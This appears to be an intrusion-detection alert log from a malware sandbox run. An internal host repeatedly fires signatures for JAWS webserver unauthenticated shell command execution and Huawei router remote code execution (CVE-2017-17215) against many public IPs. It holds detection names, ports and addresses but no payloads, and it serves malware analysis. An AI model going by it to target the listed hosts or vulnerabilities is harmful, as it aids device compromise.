                                  192.168.2.23206.74.222.8937450802030092 07/19/22-13:08:17.965068TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3745080192.168.2.23206.74.222.89
                                  192.168.2.23104.82.153.10156142802030092 07/19/22-13:07:59.554982TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5614280192.168.2.23104.82.153.101
                                  192.168.2.23200.6.240.15745274802030092 07/19/22-13:08:56.558263TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4527480192.168.2.23200.6.240.157
                                  192.168.2.23209.197.111.10941628802030092 07/19/22-13:07:18.775979TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4162880192.168.2.23209.197.111.109
                                  192.168.2.2354.252.159.17443504802030092 07/19/22-13:08:37.501485TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4350480192.168.2.2354.252.159.174
                                  192.168.2.23173.39.254.9633510802030092 07/19/22-13:08:45.473835TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3351080192.168.2.23173.39.254.96
                                  192.168.2.2345.195.121.8547410802030092 07/19/22-13:08:45.641804TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4741080192.168.2.2345.195.121.85
                                  192.168.2.2323.52.153.4433792802030092 07/19/22-13:07:59.623028TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3379280192.168.2.2323.52.153.44
                                  192.168.2.23104.144.211.13649598802030092 07/19/22-13:08:23.360992TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4959880192.168.2.23104.144.211.136
                                  192.168.2.2323.38.0.21534796802030092 07/19/22-13:08:32.475220TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3479680192.168.2.2323.38.0.215
                                  192.168.2.23173.234.127.13254298802030092 07/19/22-13:07:27.959226TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5429880192.168.2.23173.234.127.132
                                  192.168.2.2380.96.102.5659096802030092 07/19/22-13:08:45.332416TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5909680192.168.2.2380.96.102.56
                                  192.168.2.2381.140.234.7547018802030092 07/19/22-13:08:48.409035TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4701880192.168.2.2381.140.234.75
                                  192.168.2.23107.149.208.21150096802030092 07/19/22-13:07:22.160105TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5009680192.168.2.23107.149.208.211
                                  192.168.2.23186.6.8.2444962802030092 07/19/22-13:08:41.704157TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4496280192.168.2.23186.6.8.24
                                  192.168.2.23194.59.205.18542490802030092 07/19/22-13:08:17.594307TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4249080192.168.2.23194.59.205.185
                                  192.168.2.23185.80.55.3942600802030092 07/19/22-13:07:00.285636TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4260080192.168.2.23185.80.55.39
                                  192.168.2.2334.255.54.19943568802030092 07/19/22-13:07:17.266916TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4356880192.168.2.2334.255.54.199
                                  192.168.2.23154.222.18.3547602802030092 07/19/22-13:08:54.091171TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4760280192.168.2.23154.222.18.35
                                  192.168.2.23202.64.13.9138198802030092 07/19/22-13:07:51.068239TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3819880192.168.2.23202.64.13.91
                                  192.168.2.2384.54.129.13756718802030092 07/19/22-13:08:28.859280TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5671880192.168.2.2384.54.129.137
                                  192.168.2.2352.77.35.12254644802030092 07/19/22-13:08:52.297635TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5464480192.168.2.2352.77.35.122
                                  192.168.2.23161.49.25.858448802030092 07/19/22-13:07:33.214868TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5844880192.168.2.23161.49.25.8
                                  192.168.2.2345.226.67.8659782802030092 07/19/22-13:08:37.911775TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5978280192.168.2.2345.226.67.86
                                  192.168.2.23117.207.183.21948990802030092 07/19/22-13:08:08.723664TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4899080192.168.2.23117.207.183.219
                                  192.168.2.23195.123.127.16943640802030092 07/19/22-13:07:01.018442TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4364080192.168.2.23195.123.127.169
                                  192.168.2.23156.241.9.5835910372152835222 07/19/22-13:08:15.592752TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3591037215192.168.2.23156.241.9.58
                                  192.168.2.23156.226.127.16145486372152835222 07/19/22-13:08:37.809105TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4548637215192.168.2.23156.226.127.161
                                  192.168.2.2323.201.78.21835980802030092 07/19/22-13:08:12.531024TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3598080192.168.2.2323.201.78.218
                                  192.168.2.23156.244.74.22347448372152835222 07/19/22-13:08:38.261495TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4744837215192.168.2.23156.244.74.223
                                  192.168.2.2378.46.9.5238066802030092 07/19/22-13:08:28.825754TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3806680192.168.2.2378.46.9.52
                                  192.168.2.2364.77.109.21459568802030092 07/19/22-13:08:45.603555TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5956880192.168.2.2364.77.109.214
                                  192.168.2.2334.203.102.24757660802030092 07/19/22-13:08:03.779181TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5766080192.168.2.2334.203.102.247
                                  192.168.2.2380.62.237.24644454802030092 07/19/22-13:08:31.686731TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4445480192.168.2.2380.62.237.246
                                  192.168.2.23184.168.123.22952492802030092 07/19/22-13:08:12.664353TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5249280192.168.2.23184.168.123.229
                                  192.168.2.2352.201.36.14651658802030092 07/19/22-13:08:49.714144TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5165880192.168.2.2352.201.36.146
                                  192.168.2.2343.231.9.1157302802030092 07/19/22-13:08:27.322597TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5730280192.168.2.2343.231.9.11
                                  192.168.2.2337.13.10.14148110802030092 07/19/22-13:07:30.696809TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4811080192.168.2.2337.13.10.141
                                  192.168.2.23156.252.102.10647670802030092 07/19/22-13:08:31.645446TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4767080192.168.2.23156.252.102.106
                                  192.168.2.23143.204.54.7955544802030092 07/19/22-13:07:33.595119TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5554480192.168.2.23143.204.54.79
                                  192.168.2.23156.254.48.22859084372152835222 07/19/22-13:08:31.293897TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5908437215192.168.2.23156.254.48.228
                                  192.168.2.23156.244.76.20157506372152835222 07/19/22-13:07:46.276918TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5750637215192.168.2.23156.244.76.201
                                  192.168.2.2385.38.60.16243492802030092 07/19/22-13:08:15.696618TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4349280192.168.2.2385.38.60.162
                                  192.168.2.2341.175.50.10743150802030092 07/19/22-13:08:23.621435TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4315080192.168.2.2341.175.50.107
                                  192.168.2.23122.11.174.3142008802030092 07/19/22-13:08:42.714699TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4200880192.168.2.23122.11.174.31
                                  192.168.2.2323.215.86.23847000802030092 07/19/22-13:07:30.255975TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4700080192.168.2.2323.215.86.238
                                  192.168.2.23156.254.83.17240834372152835222 07/19/22-13:08:37.977030TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4083437215192.168.2.23156.254.83.172
                                  192.168.2.23184.50.140.10158644802030092 07/19/22-13:07:00.588083TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5864480192.168.2.23184.50.140.101
                                  192.168.2.23103.224.99.15159182802030092 07/19/22-13:08:03.762711TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5918280192.168.2.23103.224.99.151
                                  192.168.2.2381.128.180.22935520802030092 07/19/22-13:08:28.839435TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3552080192.168.2.2381.128.180.229
                                  192.168.2.23183.96.177.8154712802030092 07/19/22-13:08:38.047371TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5471280192.168.2.23183.96.177.81
                                  192.168.2.2364.59.72.1853726802030092 07/19/22-13:07:18.416626TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5372680192.168.2.2364.59.72.18
                                  192.168.2.23156.244.104.20060482372152835222 07/19/22-13:08:08.354000TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6048237215192.168.2.23156.244.104.200
                                  192.168.2.23218.188.102.23235270802030092 07/19/22-13:07:41.586193TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3527080192.168.2.23218.188.102.232
                                  192.168.2.23104.234.14.12758978802030092 07/19/22-13:07:44.139149TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5897880192.168.2.23104.234.14.127
                                  192.168.2.23156.250.95.9333208372152835222 07/19/22-13:08:23.655112TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3320837215192.168.2.23156.250.95.93
                                  192.168.2.23170.130.4.8834920802030092 07/19/22-13:08:42.687912TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3492080192.168.2.23170.130.4.88
                                  192.168.2.23108.48.6.2542424802030092 07/19/22-13:07:22.784862TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4242480192.168.2.23108.48.6.25
                                  192.168.2.23147.135.192.4555186802030092 07/19/22-13:08:56.449261TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5518680192.168.2.23147.135.192.45
                                  192.168.2.23164.88.173.6944316802030092 07/19/22-13:07:41.564573TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4431680192.168.2.23164.88.173.69
                                  192.168.2.2380.151.226.22446776802030092 07/19/22-13:08:09.492337TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4677680192.168.2.2380.151.226.224
                                  192.168.2.232.18.202.5259926802030092 07/19/22-13:08:59.728269TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5992680192.168.2.232.18.202.52
                                  192.168.2.23104.88.20.1749076802030092 07/19/22-13:08:12.448336TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4907680192.168.2.23104.88.20.17
                                  192.168.2.23192.227.174.4860454802030092 07/19/22-13:08:32.562556TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6045480192.168.2.23192.227.174.48
                                  192.168.2.23103.140.67.18549382802030092 07/19/22-13:08:31.842337TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4938280192.168.2.23103.140.67.185
                                  192.168.2.23177.124.0.10649316802030092 07/19/22-13:08:54.127050TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4931680192.168.2.23177.124.0.106
                                  192.168.2.23213.219.175.11447986802030092 07/19/22-13:07:00.304726TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4798680192.168.2.23213.219.175.114
                                  192.168.2.2324.194.192.22545856802030092 07/19/22-13:07:42.026466TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4585680192.168.2.2324.194.192.225
                                  192.168.2.2323.199.17.433608802030092 07/19/22-13:08:08.689244TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3360880192.168.2.2323.199.17.4
                                  192.168.2.2323.38.83.12054552802030092 07/19/22-13:07:55.586629TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5455280192.168.2.2323.38.83.120
                                  192.168.2.2395.216.181.15842198802030092 07/19/22-13:08:20.566492TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4219880192.168.2.2395.216.181.158
                                  192.168.2.2352.59.69.8147628802030092 07/19/22-13:07:00.279576TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4762880192.168.2.2352.59.69.81
                                  192.168.2.23107.152.219.23643298802030092 07/19/22-13:07:52.962768TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4329880192.168.2.23107.152.219.236
                                  192.168.2.2323.234.14.24555854802030092 07/19/22-13:07:27.816330TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5585480192.168.2.2323.234.14.245
                                  192.168.2.23156.244.189.21541524802030092 07/19/22-13:07:33.387370TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4152480192.168.2.23156.244.189.215
                                  192.168.2.23145.239.66.14849892802030092 07/19/22-13:07:33.559800TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4989280192.168.2.23145.239.66.148
                                  192.168.2.2323.81.240.9455618802030092 07/19/22-13:08:27.113462TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5561880192.168.2.2323.81.240.94
                                  192.168.2.23162.243.70.12142398802030092 07/19/22-13:07:33.341204TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4239880192.168.2.23162.243.70.121
                                  192.168.2.23186.7.130.15141998802030092 07/19/22-13:07:47.826498TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4199880192.168.2.23186.7.130.151
                                  192.168.2.2323.46.137.23041230802030092 07/19/22-13:07:19.108938TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4123080192.168.2.2323.46.137.230
                                  192.168.2.23184.50.69.23551170802030092 07/19/22-13:07:22.605062TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5117080192.168.2.23184.50.69.235
                                  192.168.2.2338.54.203.24734602802030092 07/19/22-13:08:28.975858TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3460280192.168.2.2338.54.203.247
                                  192.168.2.23104.215.11.20133166802030092 07/19/22-13:08:27.031412TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3316680192.168.2.23104.215.11.201
                                  192.168.2.2340.84.38.7456672802030092 07/19/22-13:08:26.900500TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5667280192.168.2.2340.84.38.74
                                  192.168.2.23163.152.218.20047836802030092 07/19/22-13:07:42.092674TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4783680192.168.2.23163.152.218.200
                                  192.168.2.23216.239.140.6250732802030092 07/19/22-13:08:16.030870TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5073280192.168.2.23216.239.140.62
                                  192.168.2.23217.21.47.8960546802030092 07/19/22-13:08:42.595929TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6054680192.168.2.23217.21.47.89
                                  192.168.2.2354.252.4.845926802030092 07/19/22-13:08:52.491316TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4592680192.168.2.2354.252.4.8
                                  192.168.2.23156.225.159.4836014372152835222 07/19/22-13:07:44.112197TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3601437215192.168.2.23156.225.159.48
                                  192.168.2.2318.231.19.23060394802030092 07/19/22-13:07:55.565427TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6039480192.168.2.2318.231.19.230
                                  192.168.2.2354.154.216.3355266802030092 07/19/22-13:07:55.388466TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5526680192.168.2.2354.154.216.33
                                  192.168.2.2381.83.10.3642398802030092 07/19/22-13:07:26.058801TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4239880192.168.2.2381.83.10.36
                                  192.168.2.23156.241.126.14644134372152835222 07/19/22-13:07:23.246522TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4413437215192.168.2.23156.241.126.146
                                  192.168.2.23138.68.166.25439380802030092 07/19/22-13:07:31.954071TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3938080192.168.2.23138.68.166.254
                                  192.168.2.23156.238.49.8550584372152835222 07/19/22-13:08:21.160229TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5058437215192.168.2.23156.238.49.85
                                  192.168.2.23104.117.231.10657896802030092 07/19/22-13:07:30.542803TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5789680192.168.2.23104.117.231.106
                                  192.168.2.2351.15.156.3148692802030092 07/19/22-13:07:39.005909TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4869280192.168.2.2351.15.156.31
                                  192.168.2.2323.196.204.23751622802030092 07/19/22-13:08:20.388755TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5162280192.168.2.2323.196.204.237
                                  192.168.2.2392.205.17.24646564802030092 07/19/22-13:07:58.272504TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4656480192.168.2.2392.205.17.246
                                  192.168.2.23156.254.42.15738752372152835222 07/19/22-13:08:33.802184TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3875237215192.168.2.23156.254.42.157
                                  192.168.2.2392.205.95.2543432802030092 07/19/22-13:08:38.229039TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4343280192.168.2.2392.205.95.25
                                  192.168.2.2354.205.30.357056802030092 07/19/22-13:07:18.610028TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5705680192.168.2.2354.205.30.3
                                  192.168.2.23146.59.178.10951872802030092 07/19/22-13:07:37.089654TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5187280192.168.2.23146.59.178.109
                                  192.168.2.23156.248.235.9444120802030092 07/19/22-13:08:31.823774TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4412080192.168.2.23156.248.235.94
                                  192.168.2.2354.171.175.20754872802030092 07/19/22-13:07:58.295278TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5487280192.168.2.2354.171.175.207
                                  192.168.2.23156.250.13.15956984372152835222 07/19/22-13:08:35.880974TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5698437215192.168.2.23156.250.13.159
                                  192.168.2.2335.173.158.11157296802030092 07/19/22-13:07:22.039582TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5729680192.168.2.2335.173.158.111
                                  192.168.2.23156.241.109.12752034372152835222 07/19/22-13:08:47.155468TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5203437215192.168.2.23156.241.109.127
                                  192.168.2.23108.21.128.24154434802030092 07/19/22-13:07:39.076050TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5443480192.168.2.23108.21.128.241
                                  192.168.2.23156.250.11.23636062372152835222 07/19/22-13:08:09.999688TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3606237215192.168.2.23156.250.11.236
                                  192.168.2.23104.102.14.12645990802030092 07/19/22-13:08:56.420789TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4599080192.168.2.23104.102.14.126
                                  192.168.2.23193.86.132.9845472802030092 07/19/22-13:07:00.345440TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4547280192.168.2.23193.86.132.98
                                  192.168.2.2363.246.135.1138456802030092 07/19/22-13:08:37.790333TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3845680192.168.2.2363.246.135.11
                                  192.168.2.2323.100.80.11651350802030092 07/19/22-13:08:37.511760TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5135080192.168.2.2323.100.80.116
                                  192.168.2.23156.241.106.7644312372152835222 07/19/22-13:08:55.682436TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4431237215192.168.2.23156.241.106.76
                                  192.168.2.23154.17.18.12740602802030092 07/19/22-13:08:56.892431TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4060280192.168.2.23154.17.18.127
                                  192.168.2.23154.206.95.21759254802030092 07/19/22-13:07:46.855173TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5925480192.168.2.23154.206.95.217
                                  192.168.2.2345.60.141.6940672802030092 07/19/22-13:08:12.734610TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4067280192.168.2.2345.60.141.69
                                  192.168.2.23142.132.170.18655812802030092 07/19/22-13:07:47.595110TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5581280192.168.2.23142.132.170.186
                                  192.168.2.2368.178.190.1842252802030092 07/19/22-13:07:22.592687TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4225280192.168.2.2368.178.190.18
                                  192.168.2.23135.181.161.5849710802030092 07/19/22-13:08:08.562408TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4971080192.168.2.23135.181.161.58
                                  192.168.2.2335.72.43.6142546802030092 07/19/22-13:08:31.918735TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4254680192.168.2.2335.72.43.61
                                  192.168.2.2346.37.26.10147900802030092 07/19/22-13:07:21.789013TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4790080192.168.2.2346.37.26.101
                                  192.168.2.2323.80.16.17955522802030092 07/19/22-13:08:20.542245TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5552280192.168.2.2323.80.16.179
                                  192.168.2.23156.226.106.25554366372152835222 07/19/22-13:08:05.883721TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5436637215192.168.2.23156.226.106.255
                                  192.168.2.23104.75.122.20450278802030092 07/19/22-13:08:08.887692TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5027880192.168.2.23104.75.122.204
                                  192.168.2.23108.76.155.14341002802030092 07/19/22-13:08:42.701867TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4100280192.168.2.23108.76.155.143
                                  192.168.2.23104.149.154.6955792802030092 07/19/22-13:07:59.834346TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5579280192.168.2.23104.149.154.69
                                  192.168.2.23104.120.217.9133700802030092 07/19/22-13:08:32.510397TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3370080192.168.2.23104.120.217.91
                                  192.168.2.23185.182.76.16237476802030092 07/19/22-13:08:42.606838TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3747680192.168.2.23185.182.76.162
                                  192.168.2.2323.32.144.18141284802030092 07/19/22-13:08:41.638460TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4128480192.168.2.2323.32.144.181
                                  192.168.2.23203.178.142.14044420802030092 07/19/22-13:08:45.583655TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4442080192.168.2.23203.178.142.140
                                  192.168.2.23178.114.177.20143874802030092 07/19/22-13:08:45.619585TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4387480192.168.2.23178.114.177.201
                                  192.168.2.23213.168.70.4633048802030092 07/19/22-13:07:18.574597TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3304880192.168.2.23213.168.70.46
                                  192.168.2.23172.87.76.6553414802030092 07/19/22-13:07:00.393440TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5341480192.168.2.23172.87.76.65
                                  192.168.2.2323.7.34.4455254802030092 07/19/22-13:08:42.842134TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5525480192.168.2.2323.7.34.44
                                  192.168.2.23104.119.244.13537394802030092 07/19/22-13:08:27.096655TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3739480192.168.2.23104.119.244.135
                                  192.168.2.2380.65.56.16650252802030092 07/19/22-13:07:30.630124TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5025280192.168.2.2380.65.56.166
                                  192.168.2.23181.214.234.18546720802030092 07/19/22-13:08:12.733960TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4672080192.168.2.23181.214.234.185
                                  192.168.2.2343.154.93.344562802030092 07/19/22-13:07:26.315281TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4456280192.168.2.2343.154.93.3
                                  192.168.2.23108.225.11.23452202802030092 07/19/22-13:07:00.445863TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5220280192.168.2.23108.225.11.234
                                  192.168.2.2338.34.236.7043860802030092 07/19/22-13:08:56.581578TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4386080192.168.2.2338.34.236.70
                                  192.168.2.23206.237.233.11337928802030092 07/19/22-13:07:22.302153TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3792880192.168.2.23206.237.233.113
                                  192.168.2.2345.13.132.15857102802030092 07/19/22-13:08:59.250189TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5710280192.168.2.2345.13.132.158
                                  192.168.2.23192.243.241.14636816802030092 07/19/22-13:07:51.020303TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3681680192.168.2.23192.243.241.146
                                  192.168.2.23178.32.165.19148036802030092 07/19/22-13:07:08.452033TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4803680192.168.2.23178.32.165.191
                                  192.168.2.2394.130.254.15948624802030092 07/19/22-13:08:31.688737TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4862480192.168.2.2394.130.254.159
                                  192.168.2.2317.253.5.3334008802030092 07/19/22-13:07:00.433002TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3400880192.168.2.2317.253.5.33
                                  192.168.2.23104.97.153.10556418802030092 07/19/22-13:08:37.286155TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5641880192.168.2.23104.97.153.105
                                  192.168.2.23156.254.46.4845704372152835222 07/19/22-13:07:00.433704TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4570437215192.168.2.23156.254.46.48
                                  192.168.2.23108.158.242.8657310802030092 07/19/22-13:08:20.647880TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5731080192.168.2.23108.158.242.86
                                  192.168.2.23188.166.175.22737544802030092 07/19/22-13:08:31.678854TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3754480192.168.2.23188.166.175.227
                                  192.168.2.23104.165.143.9944036802030092 07/19/22-13:07:00.590360TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4403680192.168.2.23104.165.143.99
                                  192.168.2.2368.65.123.17235344802030092 07/19/22-13:08:37.556755TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3534480192.168.2.2368.65.123.172
                                  192.168.2.2323.199.131.21242624802030092 07/19/22-13:08:12.593866TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4262480192.168.2.2323.199.131.212
                                  192.168.2.2346.20.73.18958806802030092 07/19/22-13:07:30.718644TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5880680192.168.2.2346.20.73.189
                                  192.168.2.2323.204.193.735108802030092 07/19/22-13:08:52.527591TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3510880192.168.2.2323.204.193.7
                                  192.168.2.2320.232.83.347890802030092 07/19/22-13:07:21.858188TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4789080192.168.2.2320.232.83.3
                                  192.168.2.23156.245.33.19850192372152835222 07/19/22-13:07:28.048080TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5019237215192.168.2.23156.245.33.198
                                  192.168.2.2380.64.65.8235400802030092 07/19/22-13:08:45.360399TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3540080192.168.2.2380.64.65.82
                                  192.168.2.23156.226.66.17457322372152835222 07/19/22-13:08:47.436162TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5732237215192.168.2.23156.226.66.174
                                  192.168.2.2354.251.166.21249998802030092 07/19/22-13:07:47.259987TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4999880192.168.2.2354.251.166.212
